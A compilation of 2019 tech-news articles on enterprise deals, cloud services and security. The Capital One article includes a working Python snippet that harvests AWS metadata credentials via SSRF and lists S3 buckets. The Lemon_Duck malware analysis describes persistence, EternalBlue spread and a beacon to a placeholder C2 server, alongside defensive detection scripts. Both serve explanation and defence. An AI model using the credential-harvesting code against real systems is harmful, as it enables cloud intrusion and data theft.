Salesforce closes $15.7B Tableau deal

In an amazingly quick turnaround for a deal of this scope, Salesforce announced today that it has closed the $15.7 billion Tableau deal announced in June. The deal is by far the biggest acquisition in the history of Salesforce, a company known for being highly acquisitive.

A deal of this size usually faces a high level of regulatory scrutiny and can take six months or longer to close, but this one breezed through the process and closed in less than two months.

With Tableau and MuleSoft (a company it bought last year for $6.5 billion) in the fold, Salesforce has a much broader view of the enterprise than it could have as a pure cloud company. It has access to data wherever it lives, whether on premises or in the cloud, and with Tableau, it enables customers to bring that data to life by visualizing it.

This was a prospect that excited Salesforce chairman Marc Benioff. “Tableau will make Salesforce Customer 360, including Salesforce’s analytics capabilities, stronger than ever, enabling our customers to accelerate innovation and make smarter decisions across every part of their business,” Benioff said in a statement.

As with any large acquisition involving two enormous organizations, combining them could prove challenging. The real test of this deal, once the dust has settled, will be how smoothly that transition happens and how well the two companies can work together and become a single entity under the Salesforce umbrella.

In theory, having Tableau gives Salesforce another broad path into larger and more expansive enterprise sales, but the success of the deal will really hinge on how well it folds Tableau into the Salesforce sales machine.

United Airlines CISO Emily Heath joins TC Sessions: Enterprise this September

In an era of massive data breaches, most recently the Capital One fiasco, the risk of a cyberattack, and its costly consequences, is a top existential threat to corporations big and small. At TechCrunch’s first-ever enterprise-focused event (P.S. early-bird ticket sales end August 9), that topic will be front and center throughout the day.

That’s why we’re delighted to announce United’s chief information security officer Emily Heath will join TC Sessions: Enterprise in San Francisco on September 5, where we will discuss and learn how one of the world’s largest airlines keeps its networks safe.

Joining her to talk enterprise security will be a16z partner Martin Casado and Duo Security/Cisco head of advisory CISOs Wendy Nather, among others still to be announced.

At United, Heath oversees the airline’s cybersecurity program and its IT regulatory, governance and risk management.

The U.S.-based airline has more than 90,000 employees serving 4,500 flights a day to 338 airports, including New York, San Francisco, Los Angeles and Washington, D.C.

A native of Manchester, U.K., Heath is a former police detective with the U.K. Financial Crimes Unit, where she led investigations into international investment fraud, money laundering and large-scale identity theft — and ran joint investigations with the FBI, SEC and London’s Serious Fraud Office.

Heath and her teams have been the recipients of CSO Magazine’s CSO50 Awards for their work in cybersecurity and risk.

At TC Sessions: Enterprise, Heath will join a panel of cybersecurity experts to discuss security on enterprise networks large and small — from preventing data leaks to keeping bad actors out of the network — where we’ll learn how a modern CSO moves fast without breaking things.

Join hundreds of today’s leading enterprise experts for this single-day event when you purchase a ticket to the show. The $249 early-bird sale ends Friday, August 9. Make sure to grab your tickets today and save $100 before prices go up.

Early-bird pricing ends next week for TC Sessions: Enterprise 2019

Here are five words you’ll never hear spring from the mouth of an early-stage startupper: “I don’t mind paying more.” We feel you, and that’s why we’re letting you know that the price of admission to TC Sessions: Enterprise 2019, which takes place on September 5, goes up next week.

Our $249 early-bird ticket price remains in play until 11:59 p.m. (PT) on August 9. Buy your ticket now and save $100.

Now that you’ve scored the best possible price, get ready to experience a full day focused on what’s around the corner for enterprise — the biggest and richest startup category in Silicon Valley. More than 1,000 attendees, including many of the industry’s top founders, CEOs, investors and technologists, will join TechCrunch’s editors onstage for interviews covering all the big enterprise topics — AI, the cloud, Kubernetes, data and security, marketing automation and even quantum computing, to name a few.

This conference features more than 20 sessions on the main stage, plus separate Q&As with the speakers and breakout sessions. Check out the agenda here.

Just to peek at one session, TechCrunch’s Connie Loizos will interview three top VCs — Jason Green (Emergence Capital), Maha Ibrahim (Canaan Partners) and Rebecca Lynn (Canvas Ventures) — in a session entitled Investing with an Eye to the Future. In an ever-changing technological landscape, it’s not easy for VCs to know what’s coming next and how to place their bets. Yet, it’s the job of investors to peer around the corner and find the next big thing, whether that’s in AI, serverless, blockchain, edge computing or other emerging technologies. Our panel will look at the challenges of enterprise investing, what they look for in enterprise startups and how they decide where to put their money.

Want to boost your ROI? Take advantage of our group discount — save 20% when you buy four or more tickets at once. And remember, for every ticket you buy to TC Sessions: Enterprise, we’ll register you for a free Expo Only pass to TechCrunch Disrupt SF on October 2-4.

TC Sessions: Enterprise takes place September 5, but your chance to save $100 ends next week. No one enjoys paying more, so buy an early-bird ticket today, cross it off your to-do list and enjoy your savings.

Is your company interested in sponsoring or exhibiting at TC Sessions: Enterprise 2019? Contact our sponsorship sales team by filling out this form.

What We Can Learn from the Capital One Hack

On Monday, a former Amazon employee was arrested and charged with stealing more than 100 million consumer applications for credit from Capital One. Since then, many have speculated the breach was perhaps the result of a previously unknown “zero-day” flaw, or an “insider” attack in which the accused took advantage of access surreptitiously obtained from her former employer. But new information indicates the methods she deployed have been well understood for years.

What follows is based on interviews with almost a dozen security experts, including one who is privy to details about the ongoing breach investigation. Because this incident deals with somewhat jargon-laced and esoteric concepts, much of what is described below has been dramatically simplified. Anyone seeking a more technical explanation of the basic concepts referenced here should explore some of the many links included in this story.

According to a source with direct knowledge of the breach investigation, the problem stemmed in part from a misconfigured open-source Web Application Firewall (WAF) that Capital One was using as part of its operations hosted in the cloud with Amazon Web Services (AWS).

Known as “ModSecurity,” this WAF is deployed along with the open-source Apache Web server to provide protections against several classes of vulnerabilities that attackers most commonly use to compromise the security of Web-based applications.

The misconfiguration of the WAF allowed the intruder to trick the firewall into relaying requests to a key back-end resource on the AWS platform. This resource, known as the “metadata” service, is responsible for handing out temporary information to a cloud server, including current credentials sent from a security service to access any resource in the cloud to which that server has access.

In AWS, exactly what those credentials can be used for hinges on the permissions assigned to the resource that is requesting them. In Capital One’s case, the misconfigured WAF for whatever reason was assigned too many permissions, i.e. it was allowed to list all of the files in any buckets of data, and to read the contents of each of those files.

The type of vulnerability exploited by the intruder in the Capital One hack is a well-known method called a “Server Side Request Forgery” (SSRF) attack, in which a server (in this case, CapOne’s WAF) can be tricked into running commands that it should never have been permitted to run, including those that allow it to talk to the metadata service.
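To make the mechanics concrete, here is a minimal Python sketch (using the requests and boto3 libraries) of the two-step pattern researchers have described for this class of attack. It assumes the requests are issued from, or relayed through, a server inside AWS; the metadata paths are part of AWS’s documented instance metadata API:

```python
import boto3
import requests

# The EC2 instance metadata service lives at a fixed link-local address.
# In an SSRF attack these URLs are fetched by the tricked server (here, the WAF),
# not by the attacker's own machine.
METADATA = "http://169.254.169.254/latest/meta-data/iam/security-credentials"

# Step 1: ask which IAM role the server runs under, then fetch that role's
# temporary credentials (AccessKeyId, SecretAccessKey, Token).
role = requests.get(f"{METADATA}/", timeout=2).text.strip()
creds = requests.get(f"{METADATA}/{role}", timeout=2).json()

# Step 2: an over-permissioned role then lets whoever holds those credentials
# enumerate storage buckets (and read their contents) from anywhere.
s3 = boto3.client(
    "s3",
    aws_access_key_id=creds["AccessKeyId"],
    aws_secret_access_key=creds["SecretAccessKey"],
    aws_session_token=creds["Token"],
)
for bucket in s3.list_buckets()["Buckets"]:
    print(bucket["Name"])
```

The point of the sketch is that nothing in step one requires authentication: any bug that makes the server issue an HTTP request to that link-local address can harvest the server’s temporary credentials.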

Evan Johnson, manager of the product security team at Cloudflare, recently penned an easily digestible column on the Capital One hack and the challenges of detecting and blocking SSRF attacks targeting cloud services. Johnson said it’s worth noting that SSRF attacks are not among the dozen or so attack methods for which detection rules are shipped by default in the WAF exploited as part of the Capital One intrusion.

“SSRF has become the most serious vulnerability facing organizations that use public clouds,” Johnson wrote. “The impact of SSRF is being worsened by the offering of public clouds, and the major players like AWS are not doing anything to fix it. The problem is common and well-known, but hard to prevent and does not have any mitigations built into the AWS platform.”

Johnson said AWS could address this shortcoming by including extra identifying information in any request sent to the metadata service, as Google has already done with its cloud hosting platform. He also acknowledged that doing so could break a lot of backwards compatibility within AWS.
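For comparison, here is a small sketch of the kind of extra identifying information Johnson is referring to. Google’s metadata service rejects any request that lacks a custom header, something a generic request-relaying bug usually cannot add (the endpoint path is from Google’s public metadata documentation and only resolves on a GCE instance):

```python
import requests

# Google's metadata server only answers requests carrying this custom header,
# which a naive SSRF relay typically cannot attach to the forwarded request.
URL = ("http://metadata.google.internal/computeMetadata/v1/"
       "instance/service-accounts/default/token")

print(requests.get(URL, timeout=2).status_code)  # rejected without the header

resp = requests.get(URL, headers={"Metadata-Flavor": "Google"}, timeout=2)
print(resp.status_code)  # 200 when run on the instance itself
```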

“There’s a lot of specialized knowledge that comes with operating a service within AWS, and to someone without specialized knowledge of AWS, [SSRF attacks are] not something that would show up on any critical configuration guide,” Johnson said in an interview with KrebsOnSecurity.

“You have to learn how EC2 works, understand Amazon’s Identity and Access Management (IAM) system, and how to authenticate with other AWS services,” he continued. “A lot of people using AWS will interface with dozens of AWS services and write software that orchestrates and automates new services, but in the end people really lean into AWS a ton, and with that comes a lot of specialized knowledge that is hard to learn and hard to get right.”

In a statement provided to KrebsOnSecurity, Amazon said it is inaccurate to argue that the Capital One breach was caused by AWS IAM, the instance metadata service, or the AWS WAF in any way.

“The intrusion was caused by a misconfiguration of a web application firewall and not the underlying infrastructure or the location of the infrastructure,” the statement reads. “AWS is constantly delivering services and functionality to anticipate new threats at scale, offering more security capabilities and layers than customers can find anywhere else including within their own datacenters, and when broadly used, properly configured and monitored, offer unmatched security—and the track record for customers over 13+ years in securely using AWS provides unambiguous proof that these layers work.”

Amazon pointed to several (mostly a la carte) services it offers AWS customers to help mitigate many of the threats that were key factors in this breach, including:

  • Access Advisor, which helps identify and scope down AWS roles that may have more permissions than they need;
  • GuardDuty, designed to raise alarms when someone is scanning for potentially vulnerable systems or moving unusually large amounts of data to or from unexpected places;
  • The AWS WAF, which Amazon says can detect common exploitation techniques, including SSRF attacks;
  • Amazon Macie, designed to automatically discover, classify and protect sensitive data stored in AWS.
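As an example of the first item on that list, Access Advisor data is exposed through the IAM API, so hunting for over-permissioned roles can be scripted. A minimal boto3 sketch, with a hypothetical role ARN:

```python
import time

import boto3

iam = boto3.client("iam")
ROLE_ARN = "arn:aws:iam::123456789012:role/example-waf-role"  # hypothetical

# Kick off an Access Advisor report for the role...
job_id = iam.generate_service_last_accessed_details(Arn=ROLE_ARN)["JobId"]

# ...wait for the report to finish...
while True:
    report = iam.get_service_last_accessed_details(JobId=job_id)
    if report["JobStatus"] != "IN_PROGRESS":
        break
    time.sleep(2)

# ...then flag services the role may call but has never actually used.
for svc in report["ServicesLastAccessed"]:
    if "LastAuthenticated" not in svc:
        print(f"Never used, candidate for removal: {svc['ServiceName']}")
```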

William Bengston, formerly a senior security engineer at Netflix, wrote a series of blog posts last year on how Netflix built its own systems for detecting and preventing credential compromises in AWS. Interestingly, Bengston was hired roughly two months ago to be director of cloud security for Capital One. My guess is Capital One now wishes they had somehow managed to lure him away sooner.

Rich Mogull is founder and chief technology officer with DisruptOPS, a firm that helps companies secure their cloud infrastructure. Mogull said one major challenge for companies moving their operations from sprawling, expensive physical data centers to the cloud is that very often the employees responsible for handling that transition are application and software developers who may not be as steeped in security as they should be.

“There is a basic skills and knowledge gap that everyone in the industry is fighting to deal with right now,” Mogull said. “For these big companies making that move, they have to learn all this new stuff while maintaining their old stuff. I can get you more secure in the cloud more easily than on-premise at a physical data center, but there’s going to be a transition period as you’re acquiring that new knowledge.”

Since news of the Capital One breach broke on Monday, KrebsOnSecurity has received numerous emails and phone calls from security executives who are desperate for more information about how they can avoid falling prey to the missteps that led to this colossal breach (indeed, those requests were part of the impetus behind this story).

Some of those people included executives at big competing banks that haven’t yet taken the plunge into the cloud quite as deeply as Capital One has. But it’s probably not much of a stretch to say they’re all lining up in front of the diving board.

It’s been interesting to watch over the past couple of years how various cloud providers have responded to major outages on their platforms — very often by quickly publishing detailed post-mortems on the underlying causes of the outage and what they are doing to prevent such occurrences in the future. In the same vein, it would be wonderful if this kind of public accounting extended to other big companies in the wake of a massive breach.

I’m not holding out much hope that we will get such detail officially from Capital One, which declined to comment on the record and referred me to their statement on the breach and to the Justice Department’s complaint against the hacker. That’s probably to be expected, seeing as the company is already facing a class action lawsuit over the breach and is likely to be targeted by more lawsuits going forward.

But as long as the public and private response to data breaches remains orchestrated primarily by attorneys (which is certainly the case now at most major corporations), everyone else will continue to lack the benefit of being able to learn from and avoid those same mistakes.

EternalBlue & The Lemon_Duck Cryptominer Attack

Money has always been one of the strongest motivators for cybercriminals, and cryptomining is a popular method used by malicious actors to turn a profit by abusing the computing power of end users’ machines and servers. Because of its ability to generate easy, risk-free money, cryptomining is shifting from in-browser hijacks to on-device malware, and new methods and techniques are developing all the time. In this post, we discuss a case encountered by the SentinelOne Vigilance team involving a new fileless cryptomining malware dubbed Lemon_Duck, which leverages EternalBlue in order to spread across a network. We take a deep dive into the attack and provide a detailed analysis.

Overview of Lemon_Duck

During the past few weeks, Vigilance researchers have seen a rise in lateral movement detections on customer endpoints that were all using the same technique. 

While investigating this attack campaign, we found some useful source code on GitHub published by researchers at GuardiCore, who uploaded the Base64 code of most of the attacker scripts. 

[Image: Lemon_Duck attack scripts]

The campaign also uses EternalBlue and PowerSploit, tools that have been in the wild for some years now but which threat actors continue to use as an attack vector due to their continued success in many enterprise environments.

The name Lemon_Duck, which may sound innocent enough, derives from the name of a variable that appears throughout the attack scripts in this campaign — at every stage of the attack, including in the code used to download payloads and in the headers that carry system information about the victim’s device, among many other places.

Lemon_Duck On Execution

The initial infection vector was classic lateral movement activity: a Remote Procedure Call that we subsequently identified as EternalBlue exploitation.

[Image: process service]

The attack first creates a new service with a random name on the victim’s machine to gain persistence.

[Image: randomly generated service name]

Then, as can be seen in the S1 Attack Storyline below, it initiates a fileless attack using cmd.exe that executes the following commands:

Network Shell (netsh.exe): configures the firewall so that network traffic is redirected to 1.1.1.1:53 via a newly opened port, 65529

Task Scheduler: creates a task called Rtsa in order to gain persistence, and downloads the file ipc.jsp from the attacker’s server, t[.]zer2[.]com

[Image: S1 Attack Storyline]
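For defenders, both commands leave visible artifacts on the host. Below is a minimal, illustrative Python triage sketch that checks a Windows machine for the scheduled task and port-redirection indicators described above; the indicator values are taken from this report, and the script is a starting point rather than a detection product:

```python
import subprocess

# Indicators drawn from this report
TASK_NAME = "Rtsa"                    # persistence task created by the attack
PROXY_TOKENS = ("65529", "1.1.1.1")   # firewall/port redirection described above

def run(cmd):
    """Run a command and return its stdout as text (empty string on failure)."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, timeout=30).stdout
    except (OSError, subprocess.SubprocessError):
        return ""

tasks = run(["schtasks", "/query", "/fo", "LIST"])
proxies = run(["netsh", "interface", "portproxy", "show", "all"])

if TASK_NAME in tasks:
    print(f"[!] Suspicious scheduled task found: {TASK_NAME}")

if all(tok in proxies for tok in PROXY_TOKENS):
    print("[!] Port proxy redirecting traffic to 1.1.1.1:53 via port 65529")
```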

Once the commands have been invoked, it downloads the file ipc.jsp, which contains the following partially decoded Base64:

[Image: partially decoded Base64 from ipc.jsp]

The script executes multiple URLs in memory; for each one, it creates a new scheduled task in order to download the next script in the attack, called v.js.

The v.js script contains the following partially decoded Base64:

[Image: partially decoded Base64 from v.js]

The purpose of this script is to gather system information from the victim’s machine, in the following order: computer name, GUID, MAC address, OS bit architecture and timestamp.

Once both the URL and headers have been constructed, the script sends the data to a C2 server in order to download the module relevant to that specific machine.
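As an illustration only, here is a minimal Python reconstruction of the kind of beacon the script assembles from those fields — the field names and the C2 endpoint below are placeholders, not the actual values used by the malware:

```python
import time
import uuid
import platform

# Fields per the report: computer name, GUID, MAC address, architecture, timestamp.
fields = {
    "cn": platform.node(),                                        # computer name
    "guid": str(uuid.uuid4()),                                    # machine GUID (illustrative)
    "mac": f"{uuid.getnode():012x}",                              # MAC address
    "arch": "64" if platform.machine().endswith("64") else "32",  # OS bitness
    "ts": str(int(time.time())),                                  # timestamp
}

query = "&".join(f"{k}={v}" for k, v in fields.items())
print(f"http://c2.example.invalid/report?{query}")  # placeholder C2 endpoint
```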

Such activity can also be seen in our Agent, which shows the WMI query events:

[Image: WMI query events]

While the module keeps the connection to the mining pool domains alive and utilizes the victim’s GPU and CPU to mine cryptocurrency, it also propagates itself by creating two mutexes, LocalIf and LocalMn. These are responsible for downloading two files:

  • if.bin — SHA-1: 370AC4E31B27B083ED450A18681FABEFB1E7042D
  • m6.bin — SHA-1: EA856A9F281DC5785F0DCD3D6AC23BA94F2AACA1

[Image: LocalIf call]
[Image: LocalMn call]
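Those two SHA-1 hashes can be used directly as indicators of compromise. A short Python sketch that sweeps a directory tree for matching files (the scan path is just an example):

```python
import hashlib
import pathlib

# SHA-1 IOCs for the two payloads named above
IOCS = {
    "370ac4e31b27b083ed450a18681fabefb1e7042d": "if.bin",
    "ea856a9f281dc5785f0dcd3d6ac23ba94f2aaca1": "m6.bin",
}

def sha1_of(path: pathlib.Path) -> str:
    """Hash a file in chunks so large files do not exhaust memory."""
    h = hashlib.sha1()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

for p in pathlib.Path(r"C:\Windows\Temp").rglob("*"):  # example location
    try:
        if not p.is_file():
            continue
        digest = sha1_of(p)
    except OSError:
        continue  # skip unreadable files
    if digest in IOCS:
        print(f"[!] IOC match: {p} is {IOCS[digest]}")
```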

The bin files contain two major tools:

  • PowerSploit: Uses Invoke-DllInjection for Privilege Escalation, which gives the attacker the ability to inject any DLL file into any given process ID. 
  • EternalBlue exploit: Used as a propagation tool, which gives the attacker the ability to propagate via mssql scanning, utilizing vulnerabilities in the SMB protocol.

[Image: EternalBlue exploit (1)]
[Image: EternalBlue exploit (2)]

The attack also attempts to steal credentials by utilizing techniques such as brute-force and Pass-the-Hash attacks:

[Image: password attacks]

Mitigation

Even though the malware is new and fileless, the SentinelOne Agent has a behavioral engine that detects its abnormal activity. In this case, the customer was using SentinelOne’s advanced next-gen solution and had the Vigilance service — an experienced team of analysts who acted in real time, identifying and mitigating the attack with a single remediation command from the management console.

[Image: lateral movement in console]

Without SentinelOne protection, security analysts are advised to look out for PowerShell post-exploitation scripts attempting to leverage MITRE ATT&CK techniques T1064 and T1086. These two techniques are basic and thus very common; they can be easily implemented even by amateur hackers. Recommended mitigations for these and other attack techniques can also be found on MITRE’s website.
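As a rough sketch of that advice in practice, the snippet below (Python on Windows, shelling out to the built-in wmic utility) flags running processes whose command lines combine PowerShell with patterns commonly seen in encoded or download-and-execute invocations. The pattern list is illustrative, not exhaustive:

```python
import subprocess

# Command-line fragments commonly associated with PowerShell abuse (T1086).
SUSPICIOUS = ("-enc", "-encodedcommand", "downloadstring", "invoke-expression", "iex ")

# 'wmic process get CommandLine' lists full process command lines on Windows.
out = subprocess.run(
    ["wmic", "process", "get", "CommandLine"],
    capture_output=True, text=True, timeout=30,
).stdout

for line in out.splitlines():
    lowered = line.lower()
    if "powershell" in lowered and any(tok in lowered for tok in SUSPICIOUS):
        print(f"[!] Suspicious PowerShell invocation: {line.strip()}")
```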

Conclusion

Attacks like Lemon_Duck, which use tools developed by nation-state actors and leaked online for use by ordinary criminals, are a growing problem for the enterprise. The availability of tools like EternalBlue, combined with public exploit kits, gives less sophisticated attackers a good chance of bypassing security software that cannot detect malicious behavior without relying on file signatures, reputation or whitelisting policies. Tools that rely on cloud connectivity may also fail to stop these kinds of attacks in time, due to the inevitable delay and the chance of lost internet connectivity. If you’d like to see for yourself how SentinelOne’s multi-layered approach to security can solve these problems for your business, contact us for a free demo today.



Cloud-based design tool Figma launches plug-ins

Figma, the startup looking to put design tools in the cloud, has today announced new plug-ins for the platform that will help users clean up their workflows.

Figma co-founder and CEO Dylan Field says that plug-ins have been the most requested feature from users since the company’s launch. So, for the last year, the team has been working to build plug-in functionality on the back of Figma’s API (launched in March 2018) with three main priorities: stability, speed and security.

The company has been testing plug-ins in beta for a while now, with 40 plug-ins approved at launch today.

Here are some of the standouts from launch today:

On the utility side, Rename It is a plug-in that allows designers to automatically rename and organize their layers as they work. Content Buddy, on the other hand, gives users the ability to add placeholder text (for things like phone numbers, names, etc.) that they can automatically find and replace later. Stark and ColorBlind are both accessibility plug-ins: Stark helps designers make sure their work meets the WCAG 2.0 contrast accessibility guidelines, while ColorBlind lets them see their designs through the lens of eight different types of color vision deficiency.

Other plug-ins allow for adding animation (Figmotion), changing themes (Themer), adding a map to a design (Map Maker) and more.

Anyone can create plug-ins for public use on the Figma platform, but folks can also make private plug-ins for enterprise use. For example, a Microsoft employee built a plug-in that automatically changes the theme of a design based on the various Microsoft products, such as Word, Outlook, etc.

Field says that the company currently has no plans to monetize plug-ins. Rather, the addition of plug-ins to the platform is a move based on customer happiness and satisfaction. Moreover, Figma’s home on the web allows for the product to evolve more rapidly and in tune with customers. Rather than having to build each individual feature on its own, Figma can now open up the platform to its power users to build what they’d like into the web app.

Figma has raised a total of nearly $83 million since launch, according to Crunchbase. As of the company’s latest funding round ($40 million led by Sequoia six months ago), Figma was valued at $440 million post-funding.

Why AWS gains big storage efficiencies with E8 acquisition

AWS is already the clear market leader in the cloud infrastructure market, but it’s never been an organization that rests on its past successes, whether that means a flurry of new product announcements and enhancements every year or strategic acquisitions.

When it bought Israeli storage startup E8 yesterday, it might have felt like a minor move on its face, but AWS was looking, as it always does, to find an edge and reduce the costs of operations in its data centers. It was also very likely looking forward to the next phase of cloud computing. Reports have pegged the deal at between $50 and $60 million.

What E8 gives AWS for relatively cheap money is highly advanced storage capabilities, says Steve McDowell, senior storage analyst at Moor Insights & Strategy. “E8 built a system that delivers extremely high-performance/low-latency flash (and Optane) in a shared-storage environment,” McDowell told TechCrunch.

Microsoft Azure now lets you have a server all to yourself

Microsoft today announced the preview launch of Azure Dedicated Host, a new cloud service that will allow you to run your virtual machines on single-tenant physical servers. That means you’re not sharing any resources on that server with anybody else and you’ll get full control over everything that’s running on that machine.

Azure previously offered isolated virtual machine sizes for two very large virtual machine types. Those are still available, but their use cases are limited compared to these new hosts, which offer far more flexibility.

With this move, Microsoft is following in the footsteps of AWS, which also offers Dedicated Hosts with very similar capabilities. Google Cloud, too, offers what it calls “sole-tenant nodes.”

Azure Dedicated Host will support Windows, Linux and SQL Server virtual machines and pricing is per host, independent of the number of virtual machines you end up running on them. You can currently opt for machines with up to 48 physical cores and prices start at $4.039 per hour.

To do this, Microsoft is offering two different processors to power these machines. Type 1 is based on the 2.3 GHz Intel Xeon E5-2673 v4, which can reach clock speeds of up to 3.5 GHz, while Type 2 features the Intel Xeon Platinum 8168, with single-core clock speeds of up to 3.7 GHz. The available memory ranges from 144 GiB to 448 GiB. You can find more details here.

As Microsoft notes, these new dedicated hosts can help companies reach their compliance requirements for physical security, data integrity and monitoring. The dedicated hosts still share the same underlying infrastructure as any other host in the Azure data centers, but users have full control over any maintenance window that could impact their servers.

These dedicated hosts can also be grouped into larger host groups in a given Azure region, allowing you to build clusters of your own physical servers inside the Azure data center. Because you’re actually renting a physical machine, any hardware issue on that machine will impact the virtual machines you are running on it, so chances are you’ll want multiple dedicated hosts for your failover strategy anyway.

President throws latest wrench in $10B JEDI cloud contract selection process

The $10 billion, decade-long JEDI cloud contract drama continues. It’s a process that has been dogged by complaints, regulatory oversight and court cases. Throughout the months-long selection process, the Pentagon has repeatedly denied accusations that the contract was somehow written to make Amazon a favored vendor, but today The Washington Post reports President Trump has asked the newly appointed Defense Secretary, Mark T. Esper, to examine the process because of concerns over that very matter.

The Defense Department called for bids last year for a $10 billion, decade-long contract. From the beginning, Oracle in particular complained that the process favored Amazon. Even before the RFP process began Oracle executive Safra Catz took her concerns directly to the president, but at that time he did not intervene. Later, the company filed a complaint with the Government Accountability Office, which ruled that the procurement process was fair.

Finally, the company took the case to court, alleging that a person involved in defining the selection process had a conflict of interest, due to being an employee at Amazon before joining the DoD. That case was dismissed last month.

In April, the DoD named Microsoft and Amazon as the two finalists, and the winner was finally expected to be named some time this month. It appeared that we were close to the finish line, but now that the president has intervened at the 11th hour, it’s impossible to know what the outcome will be.

What we do know is that this is a pivotal project for the DoD, which is aimed at modernizing the U.S. military for the next decade and beyond. The fact is that the two finalists made perfect sense. They are the two market leaders, and each has tools, technologies and experience working with sensitive government contracts.

Amazon is the market leader, with 33% market share. Microsoft is No. 2, with 16%. The No. 3 vendor, Google, dropped out before the RFP process began. It is unclear at this point whether the president’s intervention will have any influence on the final decision, but The Washington Post reports it is an unusual departure from government procurement procedures.

Dasha AI is calling so you don’t have to

While you’d be hard pressed to find any startup not brimming with confidence over the disruptive idea they’re chasing, it’s not often you come across a young company as calmly convinced it’s engineering the future as Dasha AI.

The team is building a platform for designing human-like voice interactions to automate business processes. Put simply, it’s using AI to make machine voices a whole lot less robotic.

“What we definitely know is this will definitely happen,” says CEO and co-founder Vladislav Chernyshov. “Sooner or later the conversational AI/voice AI will replace people everywhere where the technology will allow. And it’s better for us to be the first mover than the last in this field.”

“In 2018 in the US alone there were 30 million people doing some kind of repetitive tasks over the phone. We can automate these jobs now or we are going to be able to automate it in two years,” he goes on. “If you multiply it with Europe and the massive call centers in India, Pakistan and the Philippines you will probably have something like close to 120M people worldwide… and they are all subject for disruption, potentially.”

The New York-based startup has been operating in relative stealth up to now. But it’s breaking cover to talk to TechCrunch — announcing a $2M seed round, led by RTP Ventures and RTP Global, an early-stage investor that’s backed the likes of Datadog and RingCentral. RTP’s venture arm, also based in NY, writes on its website that it prefers engineer-founded companies that “solve big problems with technology”. “We like technology, not gimmicks,” the fund warns with added emphasis.

Dasha’s core tech right now includes what Chernyshov describes as “a human-level, voice-first conversation modelling engine”; a hybrid text-to-speech engine which he says enables it to model speech disfluencies (aka, the ums and ahs, pitch changes etc that characterize human chatter); plus “a fast and accurate” real-time voice activity detection algorithm which detects speech in under 100 milliseconds, meaning the AI can turn-take and handle interruptions in the conversation flow. The platform can also detect a caller’s gender — a feature that can be useful for healthcare use-cases, for example.

Another component Chernyshov flags is “an end-to-end pipeline for semi-supervised learning” — so it can retrain the models in real time “and fix mistakes as they go” — until Dasha hits the claimed “human-level” conversational capability for each business process niche. (To be clear, the AI cannot adapt its speech to an interlocutor in real-time — as human speakers naturally shift their accents closer to bridge any dialect gap — but Chernyshov suggests it’s on the roadmap.)

“For instance, we can start with 70% correct conversations and then gradually improve the model up to say 95% of correct conversations,” he says of the learning element, though he admits there are a lot of variables that can impact error rates — not least the call environment itself. Even cutting edge AI is going to struggle with a bad line.

The platform also has an open API so customers can plug the conversation AI into their existing systems — be it telephony, Salesforce software or a developer environment, such as Microsoft Visual Studio.

Currently they’re focused on English, though Chernyshov says the architecture is “basically language agnostic” — but does require “a big amount of data”.

The next step will be to open up the dev platform to enterprise customers, beyond the initial 20 beta testers, which include companies in the banking, healthcare and insurance sectors — with a release slated for later this year or Q1 2020.

Test use-cases so far include banks using the conversation engine for brand loyalty management to run customer satisfaction surveys that can turn around negative feedback by fast-tracking a response to a bad rating — by providing (human) customer support agents with an automated categorization of the complaint so they can follow up more quickly. “This usually leads to a wow effect,” says Chernyshov.

Ultimately, he believes there will be two or three major AI platforms globally providing businesses with an automated, customizable conversational layer — sweeping away the patchwork of chatbots currently filling in the gap. And of course Dasha intends their ‘Digital Assistant Super Human Alike’ to be one of those few.

“There is clearly no platform [yet],” he says. “Five years from now this will sound very weird that all companies now are trying to build something. Because in five years it will be obvious — why do you need all this stuff? Just take Dasha and build what you want.”

“This reminds me of the situation in the 1980s when it was obvious that the personal computers are here to stay because they give you an unfair competitive advantage,” he continues. “All large enterprise customers all over the world… were building their own operating systems, they were writing software from scratch, constantly reinventing the wheel just in order to be able to create this spreadsheet for their accountants.

“And then Microsoft with MS-DOS came in… and everything else is history.”

That’s not all they’re building, either. Dasha’s seed financing will be put towards launching a consumer-facing product atop its b2b platform to automate the screening of recorded message robocalls. So, basically, they’re building a robot assistant that can talk to — and put off — other machines on humans’ behalf.

Which does kind of suggest the AI-fuelled future will entail an awful lot of robots talking to each other… 🤖🤖🤖

Chernyshov says this b2c call screening app will most likely be free. But if your core tech looks set to massively accelerate a non-human caller phenomenon that many consumers already see as a terrible plague on their time and mind, then providing free relief — in the form of a counter AI — seems the very least you should do.

Not that Dasha can be accused of causing the robocaller plague, of course. Recorded messages hooked up to call systems have been spamming people with unsolicited calls for far longer than the startup has existed.

Dasha’s PR notes Americans were hit with 26.3BN robocalls in 2018 alone — up “a whopping” 46% on 2017.

Its conversation engine, meanwhile, has only made some 3M calls to date, clocking its first call with a human in January 2017. But the goal from here on in is to scale fast. “We plan to aggressively grow the company and the technology so we can continue to provide the best voice conversational AI to a market which we estimate to exceed $30BN worldwide,” runs a line from its PR.

After the developer platform launch, Chernyshov says the next step will be to open up access to business process owners by letting them automate existing call workflows without needing to be able to code (they’ll just need an analytic grasp of the process, he says).

Later — pegged for 2022 on the current roadmap — will be the launch of “the platform with zero learning curve”, as he puts it. “You will teach Dasha new models just like typing in a natural language and teaching it like you can teach any new team member on your team,” he explains. “Adding a new case will actually look like a word editor — when you’re just describing how you want this AI to work.”

His prediction is that a majority — circa 60% — of all the major cases businesses face — “like dispatching, like probably upsales, cross sales, some kind of support etc, all those cases” — will be able to be automated “just like typing in a natural language”.

So if Dasha’s AI-fuelled vision of voice-based business process automation comes to fruition, then humans getting orders of magnitude more calls from machines looks inevitable — as machine learning supercharges artificial speech by making it sound slicker, act smarter and seem, well, almost human.

But perhaps a savvier generation of voice AIs will also help manage the ‘robocaller’ plague by offering advanced call screening? And as non-human voice tech marches on from dumb recorded messages to chatbot-style AIs running on scripted rails to — as Dasha pitches it — fully responsive, emoting, even emotion-sensitive conversation engines that can slip right under the human radar maybe the robocaller problem will eat itself? I mean, if you didn’t even realize you were talking to a robot how are you going to get annoyed about it?

Dasha claims 96.3% of the people who talk to its AI “think it’s human”, though it’s not clear what sample size the claim is based on. (To my ear there are definite ‘tells’ in the current demos on its website. But in a cold-call scenario it’s not hard to imagine the AI passing, if someone’s not paying much attention.)

The alternative scenario, in a future infested with unsolicited machine calls, is that all smartphone OSes add kill switches, such as the one in iOS 13 — which lets people silence calls from unknown numbers.

And/or more humans simply never pick up phone calls unless they know who’s on the end of the line.

